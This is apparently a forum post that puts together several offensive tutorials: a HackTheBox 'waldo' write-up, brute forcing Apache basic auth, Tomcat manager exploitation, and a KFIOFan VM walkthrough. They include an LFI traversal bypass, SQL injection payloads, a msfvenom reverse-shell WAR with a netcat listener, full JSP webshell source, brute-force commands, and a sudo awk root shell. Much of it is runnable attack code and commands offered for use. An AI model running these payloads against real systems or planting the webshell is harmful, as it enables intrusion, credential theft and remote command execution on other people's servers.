Login

**NINZA** · 05-14-2020, 11:05 AM

0			0

Today we are going to solve another CTF challenge “waldo”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of waldo is 10.10.10.87
Penetrating Methodology

Network scanning (Nmap)
Browsing IP address through HTTP
Exploiting LFI Vulnerability
Finding RSA private key through LFI
Login through SSH using RSA private key
Escaping restricted shell
Using Linux “Capabilities” to read the root flag

Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sV -sC -T4 10.10.10.87
1
nmap -sV -sC -T4 10.10.10.87
[Image: 1.png?w=687&ssl=1]

The Nmap output shows us that there are 4 ports open: 22(SSH), 80(HTTP)
We find that port 80 is running http, so we open the IP in our browser.
[Image: 2.png?w=687&ssl=1]

We find that we were redirected to /list.html. On the webpage, we find that it was an application for list manager. We capture its request using burpsuite and find that it is listing the files in the current directory.
[Image: 3.png?w=687&ssl=1]

We try to find the application is vulnerable to LFI. We remove “list” to list the files in the current directory and find a file called “fileRead.php”. Enumerating the web application, we found that “dirRead.php” can only be used to read contents of a directory and they cannot be used to take read files. So as we the name suggests “fileRead.php” we use this page to read files.
[Image: 4.png?w=687&ssl=1]

We use “fileRead.php” to read /etc/passwd. We change the variable from “path” to “file” and use the following string to bypass the filter:
./….//….//….//….//etc//passwd
1
./….//….//….//….//etc//passwd
When we check the /etc/passwd file we find a user with a distinctive UID and GID called “nobody”.
[Image: 5.png?w=687&ssl=1]

We check the home directory using “dirRead.php” and find a directory called “nobody”. We take a look inside “/home/nobody” and find the directory called “.ssh”. As “.ssh” might contain RSA private key for SSH login, we take a look inside it.
[Image: 6.png?w=687&ssl=1]

We take a look inside “/home/nobody/.ssh/” and find a file called “.monitor”.
[Image: 7.png?w=687&ssl=1]

We read the “.monitor” file inside “/home/nobody/.ssh” using “fileRead.php” and find RSA private key.
[Image: 8.png?w=687&ssl=1]

The response is in JSON format with special characters in between the characters of RSA private key. We use this site here, to decode the JSON response into a string.
[Image: 9.png?w=687&ssl=1]

We copy the RSA private key and save it in our system to login through SSH using this key.
[Image: 10.png?w=687&ssl=1]

We change the permission for the key and login as user “nobody”, as we are unable to login as “monitor”.
chmod 600 id_rsa
ssh -i id_rsa [email protected]
1
2
chmod 600 id_rsa
ssh -i id_rsa [email protected]
Then we take a look at the home directory and find a file called “user.txt”. We take a look at the content of the file and find the first flag.
[Image: 11.png?w=687&ssl=1]

Enumerating the system we go into the “.ssh” directory and check the authorized_keys file to find monitor user is allowed to login. As we were unable to login as a monitor from the external system, we now try to login as user “monitor” internally using the RSA private key “.monitor”.
ssh -i .monitor monitor@localhost
1
ssh -i .monitor monitor@localhost
[Image: 12.png?w=687&ssl=1]

After logging in as user “monitor” we find that we have a restricted shell.
echo $SHELL
echo $PATH
1
2
echo $SHELL
echo $PATH
[Image: 13.png?w=687&ssl=1]

We are not able to change the PATH and SHELL variable, so we use the “-t” argument to spawn a TTY shell while logging through SSH. After spawning a TTY shell we are able to change the SHELL and PATH environment variables.
ssh -i .monitor monitor@localhost -t bash
export SHELL=/bin/bash
export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
1
2
3
ssh -i .monitor monitor@localhost -t bash
export SHELL=/bin/bash
export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
[Image: 14.png?w=687&ssl=1]

Then enumerating the system we don’t find anything in particular. Enumerating further we find that this machine contains “capabilities”. Now Linux “capabilities” are like suid that can give certain file special privileges. We can find them using binary called “getcap”. Now we recursively search for files using getcap and find a binary called “tac” that can read files. Now using “tac” we open root.txt inside root directory and find the final flag.
getcap -r / 2>/dev/null
tac /root/root.txt
1
2
getcap -r / 2>/dev/null
tac /root/root.txt
[Image: 16.png?w=687&ssl=1]

In this article, we will learn about how to configure the password-protected Apache Web Server to restrict from online visitors without validation so that we can hide some essential and critical information to the unauthenticated users and how to penetrate it’s the weak configuration to break its security and exploit it.
Table of Content
Introduction to HTTP Basic Authentication

Lab Set_up Requirement

Setup Password Authentication

Installing the Apache utility Package
Creating the Password File
Configuring Access Control inside the Virtual Host Definition
Configuring Access Control with .htaccess Files
Confirm the Password Authentication

Exploiting HTTP Authentication

xHydra
Hydra
Ncrack
Medusa
Metasploit
Burp Suite

Introduction to HTTP Basic Authentication
In the context of an HTTP transaction, basic access authentication is a method for an HTTP user agent to provide a username and password when requesting.
HTTP Basic authentication (BA) implementation is the simplest technique for enforcing access controls to web resources because it doesn’t require cookies, session identifiers, or login pages; rather, HTTP Basic authentication uses standard fields in the HTTP header, obviating the need for handshakes.
The BA mechanism provides no confidentiality protection for the transmitted credentials. They are merely encoded with Base64 in transit, but not encrypted or hashed in any way. HTTPS is, therefore, typically preferred used in conjunction with Basic Authentication.
For more details read from wikipedia.org
Lab Setup Requirement
Apache Server (Ubuntu 14.04)
Penetration Testing Machine (Kali Linux)
Set Up Password Authentication
Installing the Apache utility Package
Let’s start with the following command to install an Apache2 utility package called ‘htpasswd’. The htpasswd is used to create and update the flat-files used to store usernames and password for basic authentication of HTTP users.
sudo apt-get install apache2 apache2-utils
1
sudo apt-get install apache2 apache2-utils
[Image: 1.png?w=687&ssl=1]

Creating the Password File
Now use the htpasswd command to create a password file that Apache will use to authenticate users and use a hidden file “.htpasswd” in our /etc/apache2 configuration directory to store password.
sudo htpasswd -c /etc/apache2/.htpasswd raj
cat /etc/apache2/.htpasswd
1
2
sudo htpasswd -c /etc/apache2/.htpasswd raj
cat /etc/apache2/.htpasswd
[Image: 2.png?w=687&ssl=1]

Configuring Access Control inside the Virtual Host Definition
Now save the following configuration in 000-default.conf file.
gedit etc/apache2/sites-enabled/000-default.conf
1
gedit etc/apache2/sites-enabled/000-default.conf

<Directory "/var/www/html">
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
</Directory>
1
2
3
4
5
6
<Directory "/var/www/html">
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
</Directory>
[Image: 3.png?w=687&ssl=1]

Configuring Access Control with .htaccess Files
Open the main Apache configuration file to enable password protection using .htaccess files and add the following line as highlighted.
sudo gedit /etc/apache2/apache2.conf
ServerName localhost
1
2
sudo gedit /etc/apache2/apache2.conf
ServerName localhost
[Image: 4.png?w=687&ssl=1]

Enable .htaccess processing by changing the AllowOverride directive “None” to “All” in the block for the /var/www directory and then save the file and restart the apache service.
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
1
2
3
4
5
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
[Image: 5.png?w=687&ssl=1]

Next, you need to add an htaccess file to the directory you wish to restrict. Here, I want to restrict the entire website which is could be through /var/www/html, but you can place this file in any directory where you wish to restrict access:
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
1
2
3
4
AuthType Basic
AuthName "Restricted Content"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user

sudo service apache2 restart
1
sudo service apache2 restart
While configuring .htaccess file we had added few options for the block directory. Let’s see what this configuration denotes.
AuthType Basic: This will set up a basic authentication for our site.
AuthName “Restricted Contents”: This will show the name of the authentication at the prompt.
AuthUserFile /etc/apache2/.htpasswd : This will show the location of the authentication file.
Require Valid-user: This will be used by one user who has confirmed their authentication who are permitted to access the website.
[Image: 6.png?w=687&ssl=1]

Confirm the Password Authentication
Try to access your restricted content in a web browser to confirm that your content is protected. I will be accessible with a username and password prompt that looks like this:
[Image: 7.png?w=687&ssl=1]

If you will try to access the website without authentication or canceled the Required Authentication page then it will displace 401 error Unauthorized Access.
[Image: 8.1.png?w=687&ssl=1]

If you are valid users and try to access password protected website by using the valid credential, for example, we had created an account with raj: 123 to access apache HTTP service.
[Image: 8.png?w=687&ssl=1]

As you can observe that, now we are able to access the content of the website.
[Image: 9.png?w=687&ssl=1]

Exploiting HTTP Authentication
xHydra
This is the graphical version to apply dictionary attack via FTP port to hack a system. For this method to work:
Open xHydra in your Kali. And select Single Target option and there give the IP of your victim PC. And select HTTP in the box against Protocol option and give the port number 80 against the port option.
[Image: 10.png?w=687&ssl=1]

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.
Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.
[Image: 11.png?w=687&ssl=1]

After doing this, go to the Start tab and click on the Start button on the left.
Now, the process of dictionary attack will start. Thus, you will obtain the username and password of your victim.
[Image: 13.png?w=687&ssl=1]

Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, FTP, HTTP, https, SMB, several databases, and much more
Now, we need to choose wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.
Run the following command
hydra -L user.txt -P pass.txt 192.168.0.105 http-get
1
hydra -L user.txt -P pass.txt 192.168.0.105 http-get
-L: denotes the path for username list
-P: denotes the path for the password list
Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the HTTP username as raj and password as 123.
[Image: 14.png?w=687&ssl=1]

Ncrack
Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Run the following command
ncrack -U user.txt -P pass.txt

[To see content please register here]

1
ncrack -U user.txt -P pass.txt

[To see content please register here]

Here
-U: denotes the path for username list
-P: denotes the path for the password list
As you can observe that we had successfully grabbed the HTTP username as raj and password as 123.
[Image: 15.png?w=687&ssl=1]

Medusa
Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few
Run the following command
medusa -h 192.168.0.105 -U user.txt -P pass.txt -M http -f
1
medusa -h 192.168.0.105 -U user.txt -P pass.txt -M http -f
Here
-U: denotes the path for username list
-P: denotes the path for the password list
As you can observe that we had successfully grabbed the HTTP username as raj and password as 123.
[Image: 16.png?w=687&ssl=1]

Metasploit
This module attempts to authenticate to an HTTP service. Open Kali terminal type msfconsole and then type:
use auxiliary/scanner/http/http_login
msf auxiliary(scanner/http/http_login) > set user_file user.txt
msf auxiliary(scanner/http/http_login) > set pass_file pass.txt
msf auxiliary(scanner/http/http_login) > set rhosts 192.168.0.105
msf auxiliary(scanner/http/http_login) > set stop_on_success true
msf auxiliary(scanner/http/http_login) > exploit
1
2
3
4
5
6
use auxiliary/scanner/http/http_login
msf auxiliary(scanner/http/http_login) > set user_file user.txt
msf auxiliary(scanner/http/http_login) > set pass_file pass.txt
msf auxiliary(scanner/http/http_login) > set rhosts 192.168.0.105
msf auxiliary(scanner/http/http_login) > set stop_on_success true
msf auxiliary(scanner/http/http_login) > exploit
[Image: 17.png?w=687&ssl=1]

Burp Suite
Now here I had just typed the random value for authentication in order to fetch the request through Burp Suite. So before you sent the request to server turn on the burp suite and select proxy tab then, click on the intercept is on after then send the user authentication by clicking ok
[Image: 24.png?w=687&ssl=1]

Thus the sent request is captured by burp suite which you can see in the given below image. In the screenshot, I had highlighted some value in the last line. Here it says the type of authentication provided is basic and if you have read above theory of basic authentication I had described that it is encoded in base64.
Now time to generate the encoded value for authentication inside the burp suite. Click on action tab select send to intruder for HTTP Fuzzing attack.
[Image: 25.png?w=687&ssl=1]

Now open intruder frame and click on the position. Configure the position where payload will be inserted into the request. The attack type determines the way in which the payload is assigned to the payload position. Now select “the encoded value of authentication” for payload position and click to ADD button on the left side of the frame.
[Image: 26.png?w=687&ssl=1]

The base64 encoded value of Authentication is a combination of username and password now the scenario is to generate the same encoded value of authentication with the help of user password dictionary, Therefore, I have made a dictionary which contains both user password names in a text file.
In order to use the dictionary as payload click on payload tab under intruder; now load your dictionary which contains user password names from payload options.
[Image: 27.png?w=687&ssl=1]

But we want to send a request in the encoded value of our payload. To encode your payload click on ADD button available under payload processing.
A new dialog box will generate to select the rule to choose an encode option from the list; now select base64 from drag down the list of URL encode key character for payload processing.
[Image: 28.png?w=687&ssl=1]

This will start a brute force attack and try to match string for user authentication. In the screenshot, you can observe the status “200 OK” and length “11788” of the highlighted value is different from the rest of the values. This means we can use this encoded value to bypass the user authentication, which occurs from request number 5. Now check the username and password on the 5th line in the dictionary. In the dictionary I found raj: 123 have matching authentication.
Or you can also use this encoded Auth value to bypass the Apache HTTP authentication page via burp suite intercepted data.
[Image: 29.png?w=687&ssl=1]

Copy the above auth value and paste replace it with intercepted authorization a shown in below and forward the request to access restricted content.
[Image: 30.png?w=687&ssl=1]

Booom!!! Here we have successfully access the content of the website.
[Image: 31.png?w=687&ssl=1]

Hope you people have enjoyed this article and learned how weak configuration security can easily breach and the unauthorized person can access the restrict content of your website.

Hello Friends, today through this article I would like to share my experience “how to exploit Tomcat Manager Application” if you have default login credential (tomcat: tomcat). While playing CTF, many times I found Apache Tomcat is running in the target machine that has configured with default login and this can help us to get a remote machine shell. Therefore I feel, I should write all possible ways to exploit tomcat manager application to gaining web shell of the remote machine.
Table of Content

Tomcat Manager Authenticated Upload Code Execution
Generate .war Format Backdoor
Tomcat War Deployer Script
Generate a JSP Webshell

Let’s start with nmap scan and to tomcat service check port 8080 as tomcat.
nmap -sV -p8080 192.168.1.101
1
nmap -sV -p8080 192.168.1.101
[Image: 1.png?w=687&ssl=1]

From nmap output result, we found port 8080 is open for Apache Tomcat. So we navigate to the web browser and on exploring Target IP: port we saw HTTP authentication page to login in tomcat manager application.
[Image: 2.png?w=687&ssl=1]

Tomcat Manager Authenticated Upload Code Execution
This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.101
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat
msf exploit(multi/http/tomcat_mgr_upload) > exploit
1
2
3
4
5
6
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.101
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat
msf exploit(multi/http/tomcat_mgr_upload) > exploit
As result, you can observe that we have the meterpreter session of the target machine.
[Image: 3.png?w=687&ssl=1]

Generate .war Format Backdoor
We can use msfvenom for generating a .war format backdoor for java/jsp payload, all you need to do is just follow the given below syntax to create a .war format file and then run Netcat listener.
Syntax: msfvenom -p [payload] LHOST=[Kali Linux IP] LPORT=[1234] -f [file format] > [file name]
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.108 LPORT=1234 -f war > shell.war
nc -lvp 1234
1
2
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.108 LPORT=1234 -f war > shell.war
nc -lvp 1234
[Image: 4.png?w=687&ssl=1]

Now login to tomcat manager application using tomcat: tomcat as username: password. You will be welcomed by the admin dashboard where you can upload a .war file.
As you can observe I had browser the malicious shell.war file to be deployed as highlighted in the image. As soon as you will upload your file, you will see the /path entry for your file in the table of Applications
To execute your .war file, you have to click on the /.war file path mention in the Application table. Or you can directly explore http://target_IP:port/file_name.
As soon as you will execute your file you will get the reverse connection through netcat.
[Image: 6.png?w=687&ssl=1]

Booom!!! One more time we have access to remote Server.
[Image: 7.png?w=687&ssl=1]

Tomcat War Deployer Script
This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterward and provide a nice shell (either via web GUI, listening port binded on the remote machine or as a reverse tcp payload connecting back to the adversary).
In practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love tomcat: tomcat )
You can download it from here:

[To see content please register here]

git clone

[To see content please register here]

cd tomcatWarDeployer
ls
1
2
3
git clone

[To see content please register here]

cd tomcatWarDeployer
ls
[Image: 8.png?w=687&ssl=1]

Now follow the syntax to exploit the target machine without uploading the .war file manually.
Syntax : ./tomcatWarDeployer.py -U [usrename] -p [password]-H [Kali Linux IP]-p [Listening port] [target_IP]:[tomcat_port]
./tomcatWarDeployer.py -U tomcat -P tomcat -H 192.168.1.108 -p 4567 192.168.1.101:8080
1
./tomcatWarDeployer.py -U tomcat -P tomcat -H 192.168.1.108 -p 4567 192.168.1.101:8080
On executing above command, I got webshell directly as you can observe it in the given below image.
[Image: 9.png?w=687&ssl=1]

Generate a JSP Webshell
In this part, we are going to see how we can generate and deploy a Web shell to gain command execution on the Tomcat manager application.
First, we will need to write the Webshell and package it as a .war file format. To write the jsp Webshell, we are using the following code which I found from this Link:

[To see content please register here]

<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
Save the code as index.jsp and then execute the following command to package it as a .war file.
mkdir webshell
cp index.jsp webshell/
cd webshell
jar -cvf ../webshell.war *
1
2
3
4
mkdir webshell
cp index.jsp webshell/
cd webshell
jar -cvf ../webshell.war *
With the help of the above command, you will get a war file, which you can deploy in tomcat manager application.
[Image: 11.png?w=687&ssl=1]

As you can observe from the given below image, I had deployed my webshell.war file which successfully uploaded, now let’s click on this file for its execution.
[Image: 12.png?w=687&ssl=1]

On executing /webshell you will get an HTTP 404 error, now execute index.jsp file in the as given below:

[To see content please register here]

1

[To see content please register here]

On executing the above URL you will get command execution form, now use it wisely to cmd commands.
[Image: 13.png?w=687&ssl=1]

Hopefully! You have enjoyed this article how to get access to the Tomcat manager using CVE-2007-1860.

Hello friends!! Today we are going to take another boot2root challenge known as KFIOFan. This lab is designed in French language and involves Geographical coordinates factor of France to Begin this CTF where you have to find 4 flags by using your web penetration testing skill because this machine is vulnerable to SQL.
Official Description: Two French people want to start the very first fan club of the youtuber Khaos Farbauti Ibn Oblivion. But they’re not very security aware! (IMPORTANT NOTE: The whole challenge is in French, including server conf. Which may add to the difficulty if you are non-native or using a non-azerty keyboard)
You can download this VM

[To see content please register here]

.
Penetration Methodology
Network Scanning

Open port and Running Service (Nmap)

Enumeration

Abusing Http service for obtaining Credential
Use robot.txt for the first flag

Exploit

Exploiting SQL vulnerability
Obtain SSH RSA_Key
SSH Login
Catch another flag

Privilege Escalation

Check Sudo rights
Spawn root access
Capture the last flag

Walkthrough
Network Scanning
Let’s start off with scanning the network to find our target.
nmap -A 192.168.1.105
1
nmap -A 192.168.1.105
[Image: 1.png?w=687&ssl=1]

So from nmap we found two ports (22, 80) are open in the target’s machine, therefore let’s navigate to port 80 in the browser.
Enumeration
On exploring port 80, we notice it required authentication but we don’t know that. Moreover, there was a text message (This site says: “48.416667 -0.916667”) which was pointing towards some Geographical coordinates.
[Image: 2.png?w=687&ssl=1]

When we canceled the authentication page, we saw a message in the French language which was saying “Let me guess Bob, did you lose your password again? LOL”. Here we considered Bob as authorized username.
[Image: 3.png?w=687&ssl=1]

On searching 48.416667 -0.916667 coordinates in Google map, we get the location “Levaré” which could be the possible password for user Bob.
[Image: 4.png?w=687&ssl=1]

Hmmmm!! So our prediction was true and we successfully bypass HTTP authentication using Bob: Levaré
Note: Well this was not that much easier because on reboot this machine the Geo-coordinates gets changed and you will get the password accordingly.
Luckily, on exploring /robot.txt, I found our first flag randomly which was in French language and again I translate it here:
FLAG1: Congratulations you found the first flag! (Yes I know you’re hoping for a clue but at least you have the right reflexes!)
[Image: 5.1.png?w=687&ssl=1]

As officially describe above “Two French people want to start the very first fan club of the youtuber” and from the given web page we can easily read the name of that two people (Alice and Bob) are usernames.
Exploit
Again I translate the whole text of this web page and conclude user “Alice” holds some very crucial information or any important file such as SSH key.
[Image: 5.png?w=687&ssl=1]

A link on Khaosearch brings me on the search form for the CTF author’s YouTube channel, without wasting time I check for SQL injection by injecting following query:
raj" union select 1,2;#
1
raj" union select 1,2;#
Lol J ! It was vulnerable to SQL injections, let’s exploit quickly.
[Image: 6.png?w=687&ssl=1]

With the help of the following query, we try to all table and column names from inside the database.
raj" union select table_name,column_name from information_schema.columns;#
1
raj" union select table_name,column_name from information_schema.columns;#
[Image: 7.1.png?w=687&ssl=1]

I stumped when I saw an entry for SSH_Key, then I decided to check it, as it seems the most exciting.
[Image: 7.png?w=687&ssl=1]

I found another link as Alice when inject the following query to check ssh_key
raj" union select * from ssh_keys;#
1
raj" union select * from ssh_keys;#
Alice was holding Private SSH_Key which should be open properly, therefore I visit source code of this page here.
[Image: 9.png?w=687&ssl=1]

Then copy the RSA Key from —–BEGIN RSA PRIVATE KEY—– to —–END RSA PRIVATE KEY—– and past in a text file as “id_rsa” then set permission 600 for proper authentication.
chmod 600 id_rsa
1
chmod 600 id_rsa
[Image: 10.png?w=687&ssl=1]

Privilege Escalation
Now then connect to ssh using the above key and run following command:
ssh [email protected] -i id_rsa
ls
cat flag3.txt
1
2
3
ssh [email protected] -i id_rsa
ls
cat flag3.txt
So we have successfully connected to ssh and found 3rd flag also.
FLAG 3: Congratulations on coming here. This shows that you master very well the essential concepts! One last little effort and the root is yours!
For finding 4th flag we need to escalate root privilege, let’s identify sudo rights for alice with the help of the following command.
sudo -l
1
sudo -l
Hmmm!! So here alice can run awk as root without using the password and we can easily spawn root shell by exploiting this permission
sudo awk 'BEGIN {system("/bin/bash")}'
ls
cat flag4.txt
1
2
3
sudo awk 'BEGIN {system("/bin/bash")}'
ls
cat flag4.txt
FLAG 4: COMPLETE! Congratulations to you for coming here: the machine is yours, its survival or destruction is now entirely based on your ethics. Good luck Hacker!
Note: On rebooting this VM machine the Geo-coordinates get changed each time which will also affect password and SSH key and you get a new password and SSH_key each time.

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis